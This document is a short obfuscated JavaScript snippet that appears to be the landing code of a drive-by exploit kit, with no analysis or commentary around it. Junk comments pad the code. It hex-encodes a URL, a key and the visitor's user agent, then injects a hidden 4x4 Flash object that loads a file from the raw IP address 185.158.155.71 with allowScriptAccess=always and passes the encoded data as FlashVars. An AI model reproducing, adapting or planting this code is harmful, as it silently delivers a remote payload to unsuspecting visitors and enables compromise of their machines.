/*s88499d34004hssfj41253fs*/function hgfgerdfgdf(num, width){/*s7463d85693hfj1592fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s22078d74336hfj4686fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s1862d95206hfj20642fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s51990d67468hfj65288fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd12849hfs*/c += b + d;/*s4432d18688hfj81384fs*/e += 1;}return c;}/*s72471dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://185.158.155.71/?NjcxNzEw&pan=xH_QMrDYbR7FFYPfKPnEUKREMU3WA0SKwY-ZhazVF5yxFDfGpbL1FxzspVydCFyEmvJvdLMHIwGh1UTASwR&man=pmI9cW1sV96usi0OBzhTIhJWG-BeJYQgQ-JDGR7Myil_2ybAVecpywBfX6WBRyestU1gW4ggQnKz7VaOO-w&work=MTE0MjcwNjE=", ghnvbn("http://185.158.155.71/?MjM2MTM4&man=vljESJfQRhnotcBl1H9a2qi0DRyUOdh8TR_xzfYghD_puXQbZu2V30yrMkdsslxhWB61ENjOge&pan=xXzQMvWdbRXQC53EKvncT6NHMVHRHECL2Y-dmrHTefjaelWkzrLFTF_xozKASwSG6_JtdfJSDQ&work=MTA4MTM4MTg=","wexykukusw"));